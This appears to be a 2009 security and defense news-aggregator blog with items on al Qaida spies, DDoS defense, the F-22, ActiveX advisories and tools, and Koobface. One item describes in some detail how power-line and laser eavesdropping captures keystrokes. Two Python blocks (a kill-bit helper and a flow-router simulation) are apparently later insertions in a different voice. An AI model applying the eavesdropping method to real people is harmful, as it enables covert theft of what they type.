Via FAS Secrecy News Blog -

From the point of view of an al Qaida military leader, Western intelligence agents are now ubiquitous in the lands of Islam, and their operations have been extraordinarily effective. The Western spies are unfailingly lethal, leaving a trail of dead Islamist fighters behind them. Worst of all, they have managed to recruit innumerable Muslims to assist their war efforts.

“The spies… were sent to penetrate the ranks of the Muslims generally, and the mujahidin specifically, and [they] spread all over the lands like locusts,” wrote Abu Yahya al-Libi, an al Qaida field commander in Afghanistan, in a new book called “Guidance on the Ruling of the Muslim Spy” (pdf).

“The spies are busy day and night carrying out their duties in an organized and secret manner… How many heroic leaders have been kidnapped at their hands? How many major mujahidin were surprised to be imprisoned or traced? Even the military and financial supply roads of the mujahidin, which are far from the enemy’s surveillance, were found by the spies.”

Al Qaida operations have been severely impeded by the intelligence war against them, al-Libi said. “As soon as the mujahidin get secretly into an area on a dark night, they are confronted by the Cross forces and their helpers. Many are killed or captured.”

Western spies are found under every conceivable cover, al-Libi wrote. “They have among them old hunchbacked men who cannot even walk, strong young men, weak women inside their house, young girls, and even children who did not reach puberty yet. The spy might be a doctor, nurse, engineer, student, preacher, scholar, runner, or a taxi driver. The spy can be anyone….”

“The occupation armies completely rely on recruiting spies and informants from the Muslim lands they usurped and conquered… The spy lives among Muslims, being one of them: living their life, wearing their dress, eating what they eat… Therefore, he can access what the armed soldiers of the occupation cannot put hands on.”

In the new book, published in Arabic (pdf) on jihadist websites on June 30, al-Libi ruminated at length on the religious and legal problem of the Muslim spy. Can there be a Muslim who spies against other Muslims or, since such a person would by definition be an apostate, is a Muslim spy a contradiction in terms? May such a person be killed? (It depends.) To convict a spy nowadays is it necessary to rely on the traditional two witnesses? (Again, it depends.) What about a person who is mistakenly executed as a spy? (God will reward him.)

Pervading the book is a sense of the overwhelming impact of U.S. and Allied intelligence operations on jihadist forces, and the willingness of indigenous Muslims to act with Western intelligence against those forces.

[...]

“Guidance on the Ruling of the Muslim Spy” by Abu Yahya al-Libi was translated, rather clumsily, by the DNI Open Source Center. A copy was obtained by Secrecy News.

The book cited the use of electronic homing devices to guide air-launched missiles to their targets and images of several such devices were included in the original Arabic version of the book (at page 146). The purported use of the devices was discussed in “CIA Drone Targeting Tech Revealed, Qaeda Claims” by Adam Rawnsley, Wired Danger Room, July 8, 2009. Memri.org also prepared a proprietary translation of the new Al-Libi book, which was reported by Fox News last week.

DoD Seeks Defense Against Denial-of-Service Attacks

Via FCW.com -

The Defense Information Systems Agency wants commercial products that could help network administrators detect and react to distributed-denial-of-service (DDOS) attacks, according to a request for information posted today.

In such attacks, an individual or group attempts to bring down a Web site by overwhelming it with traffic.

The agency is interested in solutions that could give administrators a clear and timely picture of what is happening on their networks, alert them in the event of suspicious activity and provide options for mitigating attacks, the notice states.

“The goal of this solution is to detect and mitigate all DDOS attempts to disrupt [Defense Department] network communications and to detect internal assets displaying anomalous behavior across the Internet-to-NIPRnet boundary,” the notice states.

---------------

About damn time?

There are several articles making the rounds on the net...claiming the government ignored warnings from South Korea relating possible cyber attacks.

But did they even need a warning relating to DDoS??

Sure...in my view, DDoS isn't a super huge threat when compared to SCADA and other real "hacking" attacks...but Mafiaboy took out Yahoo!, Amazon.com, Dell, E*TRADE, eBay, and CNN in early 2000.

Isn't 9 years enough of warning?

Anti-Terror Judge Named Greek Intelligence Chief

Via oregonlive.com -

Greece's top judge involved in organized crime and terrorism cases has been named as the new director of the country's National Intelligence Service.

The appointment was announced Monday as Greek authorities are grappling with a resurgence of terrorist bombings and shootings by far-left domestic groups.

Senior judge Dimitris Papangelopoulos takes over from Ioannis Corantis, a veteran diplomat who headed the service since 2004.

Militant attacks have increased in recent months following the fatal police shooting of an Athens teenager in December, which sparked the country's worst rioting in decades.

McCain Moves to Cut F-22 Funding

Via Military.com -

Sen. John McCain moved Monday to eliminate $1.75 billion recently inserted into the proposed 2010 defense budget for more fighter jets from Lockheed Martin.

The Arizona Republican, along with Michigan Democrat Carl Levin, filed an amendment to cut the extra money for seven more F-22's. The Senate Armed Services Committee last month narrowly approved the additional funding requested by Georgia Republican Saxby Chambliss.

McCain and Levin, the committee's chairman, voted against the additional funds. The full Senate may vote on the defense spending bill this week. The House last month voted to include a $369 million down payment for 12 additional fighters to its version of the defense bill.

The White House has threatened to veto legislation that includes money for more of the radar-evading jets.

On the Senate floor, McCain said he also will strongly recommend the White House veto the defense bill if lawmakers don't act to end F-22 production.

Supporters of the F-22 have said capping production at 187 aircraft is too risky with potential adversaries like Iran, North Korea and China looming.

McCain disputed such arguments. Focusing on timely delivery of the Joint Strike Fighter, also built by Lockheed Martin, is in the best interest of the country and will be a weapon system that can meet future threats, he said.

Chambliss and other lawmakers who represent districts where F-22 production jobs are at stake have lobbied hard to keep the program. Lockheed's primary manufacturing plant is in Georgia, but key parts of the plane also are made in Texas and California.

McCain said the rationale for keeping a weapon system should never be about job creation, but about defending the nation.

The extra money would extend production of the F-22 beyond the 187 aircraft that Defense Secretary Robert Gates says are needed. Gates has argued that buying any more of the jets, which cost $140 million a piece, will undermine the Pentagon's ability to increase the size of U.S. ground forces and purchase gear for fighting unconventional wars against insurgents.

------------------------

See more over @ DoDBuzz.com

The vaunted invincibility of the F-22 founders on two incurable flaws: First, the plane’s so-called “low probability of intercept” radar may now be easily detected, thanks to the proliferation of spread spectrum technology in cell phones and laptops. That creates an environment where, if the F-22 pilot turns on his radar, he announces his presence over hundreds of miles. Even better for the enemy, the radar makes an unmistakable beacon for opposing missiles.

Second, when combat forces F-22 pilots to turn off radars, they’ll find themselves forced into a close-in, maneuvering fight. Compromised by stealth and heavy radar electronics, the plane’s agility, short range missiles, and guns are nothing special — as one of us observed at Nellis Air Force Base in Nevada when an F-16 “shot down” an F-22 in exercises.

As for the plane’s advertised ability to cruise supersonically the F-22’s low fuel capacity (27% of takeoff weight, only two thirds of what’s needed for combat-useful supersonic endurance in enemy airspace) reduces this to an air show trick. Why the big fuel shortfall? To make room for stealth technologies and radar electronics.

In summary, a vote for continuing F-22 production is a vote to decay pilots’ skills, to deny them a truly great fighter, to shrink the number of pilots and planes we can field, and to reward Congress’ unending appetite for pork. The new 2010 Defense Authorization bill should be vetoed if a single F-22 is added.

How to Use Electrical Outlets and Cheap Lasers to Steal Data

Via NetworkWorld -

If attackers intent on data theft can tap into an electrical socket near a computer or if they can draw a bead on the machine with a laser, they can steal whatever is being typed into it.

How to execute these attacks will be demonstrated at the Black Hat USA 2009 security conference in Las Vegas later this month by Andrea Barisani and Daniele Bianco, a pair of researchers for network security consultancy Inverse Path.

“The only thing you need for successful attacks are either the electrical grid or a distant line of sight, no expensive piece of equipment is required,” Barisani and Bianco say in a paper describing the hacks.

The equipment to carry out the power-line attack could cost as little as $500, and the laser attack gear costs about $100 if the attacker already owns a laptop with a sound card, says Barisani. Carrying out the attacks took about a week, he says.

“We think it is important to raise the awareness about these unconventional attacks and we hope to see more work on this topic in the future,” Barisani and Bianco say in their paper. Others with more time and money could doubtless create better spying tools using the same concepts, they say.

In the power-line exploit, the attacker grabs the keyboard signals that are generated by hitting keys. Because the data wire within the keyboard cable is unshielded, the signals leak into the ground wire in the cable, and from there into the ground wire of the electrical system feeding the computer. Bit streams generated by the keyboards that indicate what keys have been struck create voltage fluctuations in the grounds, they say.

Attackers extend the ground of a nearby power socket and attach to it two probes separated by a resistor. The voltage difference and the fluctuations in that difference – the keyboard signals – are captured from both ends of the resistor and converted to letters.

To pull the signal out of the ground noise, a reference ground is needed, they say. “A “reference” ground is any piece of metal with a direct physical connection to the Earth, a sink or toilet pipe is perfect for this purpose (while albeit not very classy) and easily reachable (especially if you are performing the attack from [a] hotel room),” they say in their paper.

Since keyboards and mice signals are in the 1 to 20 kHz range, a filter can isolate that range for listening, they say.

Variations in individual keyboards and mice result in each keyboard signaling in a slightly different frequency range. With careful filtering, that makes it possible to zero in on a particular keyboard in an environment where many keyboards are in use, the researchers say.

The attack proved successful when tapping electric sockets located up to 15 meters from where the target computer was plugged in, the researchers say.

This method would not work if the computer were unplugged from the wall, such as a laptop running on its battery. The second attack can prove effective in this case, Bianco’s and Barisani’s paper says.

Attackers point a cheap laser, slightly better than what is used in laser pointers, at a shiny part of a laptop or even an object on the table with the laptop. A receiver is aligned to capture the reflected light beam and the modulations that are caused by the vibrations resulting from striking the keys.

This modulation is converted to an electrical signal that is fed into a computer soundcard.

“The vibration patterns received by the device clearly show the separate keystrokes,” the researchers’ paper says. Each key has a unique vibration pattern that distinguishes it from the rest. The spacebar creates a significantly different set of vibrations, so the breaks between words are readily apparent.

Analyzing the sequences of individual keys that are struck and the spacing between words, the attacker can figure out what message has been typed. Knowing what language is being typed is a big help, they say.

Laptop lids, especially shiny logos and areas close to the hinges, provide the most easily read vibrations.

Anyone worried about this type of attack can make sure there is no line of sight to the laptop, move position frequently while typing, and pollute the signal by striking random keys and later deleting them with the backspace key.

While they admit their hacking tools are rudimentary, they believe they could be improved upon with a little time, effort and backing.

“If our small research was able to accomplish acceptable results in a brief development time (approximately a week of work) and with cheap hardware,” they say. “Consider what a dedicated team or government agency can accomplish with more expensive equipment and effort.”

Vulnerability in Microsoft Office Web Components Control Could Allow Remote Code Execution

Via SANS Internet Storm Center -

Microsoft has released an advisory related to an Office Web Components ActiveX vulnerability; it is available here. This vulnerability exists in the ActiveX control used by IE to display Excel spreadsheets. The CVE entry for the vulnerability is CVE-2009-1136. Microsoft mentions that they are aware of active exploits against this vulnerability, although we at the SANS Internet Storm Center haven't seen it used or mentioned in public as of yet, which may tend to indicate it has been used in targeted rather than broad-based attacks. At the moment there is no patch; there is a workaround, and it can be automated for enterprise deployment. The specific CLSIDs to set the killbit for are:

{0002E541-0000-0000-C000-000000000046}
{0002E559-0000-0000-C000-000000000046}

Start working on this ASAP. The impact is remote code execution with the privileges of the logged-in user running Internet Explorer, and might not require user intervention. As in browse to a nasty web site and be pwn3d.

Advisory: http://www.microsoft.com/technet/security/advisory/973472.mspx

KB article: http://support.microsoft.com/kb/973472

SRD blog: http://blogs.technet.com/srd/archive/2009/07/13/more-information-about-the-office-web-components-activex-vulnerability.aspx

MSRC blog: http://blogs.technet.com/msrc/archive/2009/07/13/microsoft-security-advisory-973472-released.aspx

[...]

Update1: The vulnerability is being actively exploited on web sites. More to follow.
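For the "automated for enterprise deployment" part of the workaround, here is an added Python example (my own code, not the ISC's or Microsoft's). It renders the .reg fragment that sets the kill bit for the two CLSIDs above and audits a `reg export` of the ActiveX Compatibility key to list which of them still lack it. The registry path and the 0x400 "Compatibility Flags" value are Microsoft's documented kill-bit mechanism; the function names and the sample export text are my own construction.

```python
"""Kill-bit helpers for the two Office Web Components CLSIDs (added example).

The registry location and flag value are Microsoft's documented kill-bit
mechanism; the helper names and the sample export are mine, not the ISC's.
"""
import re

KILL_BIT = 0x400  # "Compatibility Flags" bit that stops IE instantiating the control
ACTIVEX_COMPAT = (r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer"
                  r"\ActiveX Compatibility")
OWC_CLSIDS = (
    "{0002E541-0000-0000-C000-000000000046}",
    "{0002E559-0000-0000-C000-000000000046}",
)


def killbit_reg_file(clsids) -> str:
    """Render a .reg file that sets the kill bit for each CLSID, suitable for
    import with reg.exe or distribution through Group Policy preferences."""
    lines = ["Windows Registry Editor Version 5.00", ""]
    for clsid in clsids:
        lines += [f"[{ACTIVEX_COMPAT}\\{clsid}]",
                  f'"Compatibility Flags"=dword:{KILL_BIT:08x}', ""]
    return "\n".join(lines)


_KEY_LINE = re.compile(r"^\[(.+)\]$")
_FLAGS_LINE = re.compile(r'^"Compatibility Flags"=dword:([0-9A-Fa-f]{8})$')


def parse_reg_export(text: str) -> dict:
    """Parse a `reg export` of the ActiveX Compatibility key into {CLSID: flags}.
    Only subkeys that look like a CLSID are kept."""
    flags, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        key = _KEY_LINE.match(line)
        if key:
            current = key.group(1).rsplit("\\", 1)[-1].upper()
            continue
        val = _FLAGS_LINE.match(line)
        if val and current and current.startswith("{"):
            flags[current] = int(val.group(1), 16)
    return flags


def unprotected(clsids, reg_export: str) -> list:
    """Return the CLSIDs whose kill bit is absent from the export (audit view)."""
    flags = parse_reg_export(reg_export)
    return [c for c in clsids if not flags.get(c.upper(), 0) & KILL_BIT]


# Constructed sample export: only the first OWC CLSID has been kill-bitted.
SAMPLE_EXPORT = "\n".join([
    "Windows Registry Editor Version 5.00",
    "",
    r"[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility]",
    "",
    r"[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{0002E541-0000-0000-C000-000000000046}]",
    '"Compatibility Flags"=dword:00000400',
    "",
])

if __name__ == "__main__":
    print("still unprotected:", unprotected(OWC_CLSIDS, SAMPLE_EXPORT))
    print(killbit_reg_file(OWC_CLSIDS))
```

Two practical points when running this against real exports: `reg export` writes UTF-16 with a byte-order mark, so decode the file as such before handing it to `parse_reg_export`; and on 64-bit Windows the 32-bit Internet Explorer reads the ActiveX Compatibility key under the Wow6432Node branch, so a complete deployment sets the kill bit in both locations and an audit checks both.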

Sunday, July 12, 2009

Tools of the Trade - Microsoft Video ActiveX Control 0day Edition

Cody Pierce of TippingPoint DVLabs recently blogged a detailed technical analysis of the recent Microsoft Video ActiveX Control (msvidctl.dll) 0day, which many are expecting Microsoft to patch early next week.

Microsoft also plans to patch the currently open Directshow vulnerability...

--------------------

On to the tools....

On July 11th, Sun released Virtual Box v3.0.2. VirtualBox is a general-purpose full virtualizer for x86 hardware. This is a maintenance release of VirtualBox 3.0 which improves stability and performance. Check out the changelog for all the details.

On July 9th, Frederic Raynal & Guillaume Delugre released origami 1.0.0-beta0. Origami is a Ruby framework designed to parse, analyze, edit, manipulate, forge, exploit PDF files. This is NOT a PDF rendering library. It aims at providing a scripting tool to generate and/or analyze malicious PDF files. As well, it can be used to create on-the-fly customized PDFs, or to inject (evil) code into already existing documents.

On July 8th, Gabriel Campana released Fuzzgrind 090622. Fuzzgrind is a fully automatic fuzzing tool, generating test files with the purpose of discovering new execution paths likely to trigger bugs and potentially vulnerabilities. It is based on the concept of symbolic execution.

On July 8th, Drew Yao of Apple Product Security announced the release of CrashWrangler. CrashWrangler is basically Apple's version of the !exploitable tool released by Microsoft. It is a set of tools to determine if a crash is an exploitable security issue, and if a crash is a duplicate of another known crash. The exploitability diagnosis is intended to be used when you have a reproducible test case, but the duplicate detection can be run on any crash log. CrashWrangler supports Mac OS X 10.5 and later. The toolset is free to anyone with an ADC account.

On July 8th, Terence Stenvold released Harald Scan v0.2. Harald Scan is a Bluetooth discovery scanner written in Python. It determines Major and Minor device classes according to the Bluetooth SIG specification and attempts to resolve a device's MAC address to the largest known vendor/MAC address list.

On July 7th, VLC Media Player 1.0 was released. VLC media player is a highly portable multimedia player for various audio and video formats as well as DVDs, VCDs, and various streaming protocols without external codec or program. This major release introduces many new features, new formats and new codecs to the VLC multimedia framework and fixes a very high number of bugs that were present in the 0.9.x or 0.8.6 versions.

On June 27th, Tor-ramdisk 20090627 was released. Tor-ramdisk is an i686 uClibc-based micro Linux distribution whose sole purpose is to securely host a Tor server purely in RAM. Check out the changelog for all the details.

On June 26th, Maxim Bourmistrov released Trafscrambler v0.1. Trafscrambler is an anti-sniffer/IDS NKE (Network Kernel Extension) for Mac OS X. This initial release implements SYN-decoy, Pre/Post connections SYN, TCP reset, and zero window attacks. Author tested this on x86 OS X versions 10.5.6 and 10.5.7. It should work on PPC and older releases as well.

On June 25th, Nmap 4.90 RC1 was released. This release fixed a hanging bug in OS X. Check the changelog for all the details.

On June 25th, CCleaner v2.21.940 was released. CCleaner is a freeware system optimization, privacy and cleaning tool. It removes unused files from your system - allowing Windows to run faster and freeing up valuable hard disk space. Check the version history for all the details.

On June 25th, Tor v0.2.0.35 was released. Tor is a network of virtual tunnels that allows people and groups to improve their privacy and security on the Internet. Tor 0.2.0.35 fixes a big bug that was causing Tor relays with dynamic IP addresses to disappear from the network. It also fixes a rare crash bug on fast exit relays. Check out the announcement for all the details.

On June 25th, PHD Virtual released Patch Downloader v6. This tool is a freeware solution to simplify patch downloading for various VMware ESX versions. It eases the pain of downloading patches for various ESX versions from the VMware support site by automating the process for users that cannot use the VMware Update Manager. Now, rather than downloading each patch manually through a Java download manager, VMware administrators can simply select the version of ESX from the Patch Downloader drop-down menu, and select the download location (including folder, drive map, SMB share, etc.).

On June 24th, Kismet-2009-06-R1 was released. Kismet is an 802.11 layer 2 wireless network sniffer. This release drops the "candidate" designation, and is the first full release of the Kismet-Newcore code. It includes a number of UI improvements (better network details, more mouse support, fixed color handling, and network notes), multiple platform-specific fixes (OS X installation, Nokia ITT bugfixes, and BSD fixes), has improved source handling on Linux, de-cloaked SSID caching, and more. Check out the SVN commit notes for more.

On June 17th, Adobe released Shockwave Player version 11.5.0.600. According to Adobe's Security Bulletin (APSB09-08), this version fixes a vulnerability which could allow an attacker to take control of the affected system.

Russian Military Shot Down Own Planes in Georgian War

Via foreignpolicy.com -

A new report from the Moscow-based Center for Analysis of Strategy and Technology says that half the Russian planes lost in last summer's five-day war were shot down by friendly fire. The latest issue of the Moscow Defense Brief reports that Russia lost six jets in the war with Georgia, not four as officials claimed at the time. At least three were downed by the Russians themselves. The article said:

Russian aircraft were frequently taken by Russian and Ossetian forces for Georgian aircraft, and they were fired upon without identification and in the absence of any aggressive action on their part.

The journal is highly critical of coordination within the Russian military, asserting that the army and the air force ran "completely separate campaigns." It raises concerns as to Russia's capabilities to win a war against a better-trained and better-equipped army in the future.

Pakistani Jets Pound Taliban Hide-outs in South Waziristan

Via Gulfnews.com -

Intelligence officials say fighter jets have pounded suspected militant hide-outs in the South Waziristan tribal region as part of ongoing operations against Pakistani Taliban chief Baitullah Mehsud. At least eight militants were killed.

Meanwhile, police said gunmen ambushed five police officers and a forestry official responding to reports of a dead body in northwestern Pakistan, killing all six.

The fighter jets hit several locations in South Waziristan on Sunday, killing eight militants in one spot, two intelligence officials, who spoke on condition of anonymity because they are not authorised to speak to media, told The Associated Press.

South Waziristan is part of the lawless tribal region along Pakistan's border with Afghanistan, and top Taliban and Al Qaida leaders are believed to be hiding there.

Chinese Spying Claimed in Purchases of NSA Crypto Gear

Via Wired.com -

A Chinese national was indicted this week for conspiring to violate U.S. export law, following a nearly three-year investigation into his alleged efforts to acquire sensitive military and NSA-encryption gear from eBay and other internet sources.

Chi Tong Kuok, of Macau, told Defense Department and Customs investigators that he had been “acting at the direction of officials for the People’s Republic of China,” according to a government affidavit in the case. “Kuak indicated he and PRC officials sought the items to figure out ways to listen to or monitor U.S. government and military communications.”

Kuok was arrested at the Atlanta International Airport last month en route from Paris to Panama, where he allegedly planned to meet an undercover federal agent he believed was going to provide him with military radios. He was transferred to California, where he was indicted (.pdf) Tuesday for money laundering, conspiracy, smuggling and one count of attempting to export a defense article without a license.

[...]

Using a Yahoo e-mail address and a different name, Kuok also allegedly contacted an Arizona company this year that had posted on eBay a KG-175 TACLANE — an NSA designed encryption device used to communicate with classified military computer networks, such as the Defense Department’s SIPRNet.

It’s legal to own the equipment, which can’t access anything without the proper crypto key, but export is tightly restricted. The Arizona company initially refused to ship the NSA gear to Macau, but at the government’s request, later allowed another undercover agent to negotiate a deal with Kuok while posing as a company official.

“In subsequent e-mails, Kuok indicated he was interested in buying the KG-175 if it came with a particular key,” reads an affidavit by John Helsing of the Defense Criminal Investigative Service, who does not elaborate. Kuok allegedly sent the undercover agent $1,700 by Western Union for the crypto device, and then forwarded a list of additional items he wanted. “I am also thinking about if you are FBI or something like that,” Kuok allegedly wrote in an e-mail.

Despite his misgivings, Kuok sent the agent another $10,000 for more PRC-148 radios. “When you send the radios, remove all label and write it as vintage walkie talkie, thank you,” he allegedly instructed.

The undercover agent and Kuok agreed to meet in Panama to complete the delivery. Unfortunately for Kuok, his plane stopped in Atlanta, where he was arrested and held without bail. Investigators reviewed Kuok’s eBay and PayPal accounts and determined he had successfully purchased other export-controlled items online, beginning in 2005.

On Wednesday, the government obtained search warrants for two USB flash drives, a laptop computer and several cell phones Kuok had in his carry-on bag, as well as for a cell phone SIM card in his possession.

“Kuok claimed in his post-arrest interview that his PRC ‘handlers(s)’ gave him a SIM card and instructed him to place it in his phone once he landed in Panama,” wrote Helsing in his affidavit.

Saturday, July 11, 2009

Reinventing the Router - From Packet Management to Flow Management

Via spectrum.ieee.org -

The Internet is broken.
I should know: I designed it. In 1967, I wrote the first plan for the ancestor of today’s Internet, the Advanced Research Projects Agency Network, or ARPANET, and then led the team that designed and built it. The main idea was to share the available network infrastructure by sending data as small, independent packets, which, though they might arrive at different times, would still generally make it to their destinations. The small computers that directed the data traffic—I called them Interface Message Processors, or IMPs—evolved into today’s routers, and for a long time they’ve kept up with the Net’s phenomenal growth. Until now.

Today Internet traffic is rapidly expanding and also becoming more varied and complex. In particular, we’re seeing an explosion in voice and video applications. Millions regularly use Skype to place calls and go to YouTube to share videos. Services like Hulu and Netflix, which let users watch TV shows and movies on their computers, are growing ever more popular. Corporations are embracing videoconferencing and telephony systems based on the Internet Protocol, or IP. What’s more, people are now streaming content not only to their PCs but also to iPhones and BlackBerrys, media receivers like the Apple TV, and gaming consoles like Microsoft’s Xbox and Sony’s PlayStation 3. Communication and entertainment are shifting to the Net.

But this shift is not without its problems. Unlike e-mail and static Web pages, which can handle network hiccups, voice and video deteriorate under transmission delays as short as a few milliseconds. And therein lies the problem with traditional IP packet routers: They can’t guarantee that a YouTube clip will stream smoothly to a user’s computer. They treat the video packets as loose data entities when they ought to treat them as flows.

Consider a conventional router receiving two packets that are part of the same video. The router looks at the first packet’s destination address and consults a routing table. It then holds the packet in a queue until it can be dispatched. When the router receives the second packet, it repeats those same steps, not “remembering” that it has just processed an earlier piece of the same video. The addition of these small tasks may not look like much, but they can quickly add up, making networks more costly and less flexible.

At this point you might be asking yourself, “But what’s the problem, really, if I use things like Skype and YouTube without a hitch?” In fact, you enjoy those services only because the Internet has been grossly overprovisioned. Network operators have deployed mountains of optical communication systems that can handle traffic spikes, but on average these run much below their full capacity. Worse, peer-to-peer (P2P) services, used to download movies and other large files, are eating more and more bandwidth. P2P participants may constitute only 5 percent of the users in some networks, while consuming 75 percent of the bandwidth.

So although users may not perceive the extent of the problem, things are already dire for many Internet service providers and network operators. Keeping up with bandwidth demand has required huge outlays of cash to build an infrastructure that remains underutilized. To put it another way, we’ve thrown bandwidth at a problem that really requires a computing solution.

With these issues in mind, my colleagues and I at Anagran, a start-up I founded in Sunnyvale, Calif., set out to reinvent the router. We focused on a simple yet powerful idea: If a router can identify the first packet in a flow, it can just prescreen the remaining packets and bypass the routing and queuing stages. This approach would boost throughput, reduce packet loss and delays, allow new capabilities like fairness controls—and while we’re at it, save power, size, and cost. We call our approach flow management.
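To make the per-packet versus per-flow difference concrete, here is an added simulation (not Anagran's code, and not from the IEEE article): a conventional router that does a longest-prefix-match lookup on every packet, next to a flow router that looks up the first packet of a flow, caches the decision under the 5-tuple, and fast-paths the rest until the flow goes idle. The routing table, the 30-second idle timeout, and the packet stream are all constructed for the example.

```python
"""Flow-cache forwarding next to per-packet forwarding (added example).
Not Anagran's code; the routing table, the 5-tuple flow key, the 30 s idle
timeout and the packet stream below are all constructed assumptions."""
import ipaddress
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

FlowKey = Tuple[str, str, int, int, str]  # src, dst, sport, dport, proto


@dataclass
class Packet:
    src: str
    dst: str
    sport: int
    dport: int
    proto: str
    ts: float  # arrival time in seconds (constructed)


@dataclass
class FlowEntry:
    next_hop: str
    packets: int = 0
    last_seen: float = 0.0


class ConventionalRouter:
    """Per-packet forwarding: every packet pays a longest-prefix-match lookup."""
    def __init__(self, routes: Dict[str, str]):
        # routes maps a CIDR prefix to a next hop; the longest prefix wins
        self.routes = sorted(
            ((ipaddress.ip_network(p), nh) for p, nh in routes.items()),
            key=lambda r: r[0].prefixlen, reverse=True)
        self.table_lookups = 0

    def route_lookup(self, dst: str) -> Optional[str]:
        self.table_lookups += 1
        addr = ipaddress.ip_address(dst)
        for net, nh in self.routes:
            if addr in net:
                return nh
        return None

    def forward(self, pkt: Packet) -> Optional[str]:
        return self.route_lookup(pkt.dst)


class FlowRouter(ConventionalRouter):
    """Flow management: one table lookup per flow, then flow-cache hits."""
    def __init__(self, routes: Dict[str, str], idle_timeout: float = 30.0):
        super().__init__(routes)
        self.flows: Dict[FlowKey, FlowEntry] = {}
        self.idle_timeout = idle_timeout
        self.cache_hits = 0

    @staticmethod
    def key(pkt: Packet) -> FlowKey:
        return (pkt.src, pkt.dst, pkt.sport, pkt.dport, pkt.proto)

    def expire(self, now: float) -> int:
        # drop flows idle longer than the timeout; returns how many were dropped
        stale = [k for k, e in self.flows.items()
                 if now - e.last_seen > self.idle_timeout]
        for k in stale:
            del self.flows[k]
        return len(stale)

    def forward(self, pkt: Packet) -> Optional[str]:
        self.expire(pkt.ts)
        k = self.key(pkt)
        entry = self.flows.get(k)
        if entry is None:  # first packet of the flow: route it and remember
            nh = self.route_lookup(pkt.dst)
            if nh is None:
                return None
            entry = self.flows[k] = FlowEntry(next_hop=nh)
        else:  # later packet of a known flow: bypass the routing table
            self.cache_hits += 1
        entry.packets += 1
        entry.last_seen = pkt.ts
        return entry.next_hop


def sample_stream() -> List[Packet]:
    """Constructed traffic: an 8-packet video flow, two DNS queries, one
    packet to an external host, then a late packet of the video flow."""
    video = [Packet("10.20.1.5", "10.20.7.9", 50000, 443, "udp", float(t))
             for t in range(8)]
    dns = [Packet("10.20.1.5", "10.3.3.3", 40000 + i, 53, "udp", 8.0 + i)
           for i in range(2)]
    ext = [Packet("10.20.1.5", "198.51.100.1", 50001, 80, "tcp", 10.0)]
    late = [Packet("10.20.1.5", "10.20.7.9", 50000, 443, "udp", 60.0)]
    return video + dns + ext + late


def compare(stream: List[Packet]) -> Tuple[int, int, int]:
    """Returns (conventional lookups, flow-router lookups, flow cache hits)."""
    routes = {"0.0.0.0/0": "upstream", "10.0.0.0/8": "core-a",
              "10.20.0.0/16": "core-b"}
    conv, flow = ConventionalRouter(routes), FlowRouter(routes)
    for pkt in stream:
        assert conv.forward(pkt) == flow.forward(pkt)  # same forwarding decision
    return conv.table_lookups, flow.table_lookups, flow.cache_hits
```

On the constructed stream `compare(sample_stream())` gives 12 table lookups for the conventional router against 5 for the flow router, with 7 packets served from the flow cache; the late video packet shows a flow that timed out being routed again.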

Twitter Suspends User Accounts Infected With Koobface Worm

Via DarkReading -

Twitter is warning members that the Koobface worm is on the loose in the Twitterverse, and that the social network is temporarily suspending any accounts it discovers spreading the worm.

In a blog post last night, Twitter said some Twitter users' PCs were infected with a variant of Koobface, which sends phony tweets when the infected user logs onto his or her Twitter account.

"We are currently suspending all accounts that we detect sending such bogus tweets. If we suspend your account, we will send you an email notifying you of the suspension. This email also includes tips for removing the malware from your PC," the Twitter blog said.

As in previous attacks on other social networking sites, the worm's mode of infection is a phony video link that, when clicked, infects the user with the worm. Among the Koobface tweets are messages similar to ones Koobface used on Facebook -- "My home video," "Watch my new private video! LOL :)" and some links purportedly to Michael Jackson video clips, according to Graham Cluley, senior technology consultant for Sophos. Cluley blogged about the attacks today.

Koobface has been used to target users on Facebook, MySpace, and other social networking sites during the past year, spreading via an infected member's profile to his friends' profiles.

Friday, July 10, 2009

Happy Birthday Nikola Tesla

Nikola Tesla (10 July 1856 – 7 January 1943) was an inventor and a mechanical and electrical engineer. Tesla was an ethnic Serb born in the village of Smiljan, Vojna Krajina, in the territory of today's Croatia. He was a subject of the Austrian Empire by birth and later became an American citizen. He is frequently cited as one of the most important contributors to the birth of commercial electricity, a man who "shed light over the face of Earth". He is best known for many revolutionary contributions in the field of electricity and magnetism in the late 19th and early 20th centuries. Tesla's patents and theoretical work formed the basis of modern alternating current (AC) electric power systems, including the polyphase power distribution systems and the AC motor, with which he helped usher in the Second Industrial Revolution.

The SI unit measuring magnetic flux density or magnetic induction (commonly known as the magnetic field "B"), the tesla, was named in his honor (at the Conférence Générale des Poids et Mesures, Paris, 1960), as well as the Tesla effect of wireless energy transfer to wirelessly power electronic devices which Tesla demonstrated on a low scale (lightbulbs) as early as 1893 and aspired to use for the intercontinental transmission of industrial energy levels in his unfinished Wardenclyffe Tower project.

Aside from his work on electromagnetism and electromechanical engineering, Tesla contributed in varying degrees to the establishment of robotics, remote control, radar and computer science, and to the expansion of ballistics, nuclear physics, and theoretical physics. In 1943, the Supreme Court of the United States credited him as being the inventor of the radio.

Lawmaker Wants ‘Show of Force’ Against North Korea for Website Attacks

Via Wired.com (Threat Level) -

A key Republican lawmaker on Thursday urged President Obama to launch a cyber attack against North Korea, or increase international sanctions against the communist country, in the wake of an unknown hacker’s denial-of-service attacks on U.S. and South Korean websites.

Rep. Peter Hoekstra (R-Michigan), the lead Republican on the House Intelligence Committee, said the U.S. should conduct a “show of force or strength” against North Korea for a supposed role in a round of attacks that hit numerous government and commercial websites this week.

Hoekstra, speaking on the conservative America’s Morning News radio show, produced by the Washington Times newspaper, said that “some of the best people in America” had been investigating the attacks and concluded that most likely “all the fingers” point to North Korea as the culprit.

They’re reaching the conclusion that this was a state act and that “this couldn’t be some amateurs,” claimed Hoekstra, in direct opposition to what security experts have actually been saying.

He added that North Korea needed to be “sent a strong message.”

-------------------------------

Rep. Peter Hoekstra's idea of launching a cyber counterattack against North Korea sounds very knee-jerky and just plain wrong at this point.....

Point One

As Gadi Evron points out in his DarkReading article, it is silly to just look at the technical information (IP address, exploits used and malware family) and think you can determine who is behind a series of DDoS attacks.

Only with a complete analysis of all-source intelligence can you even begin to make an educated guess about who and where the attackers are based.

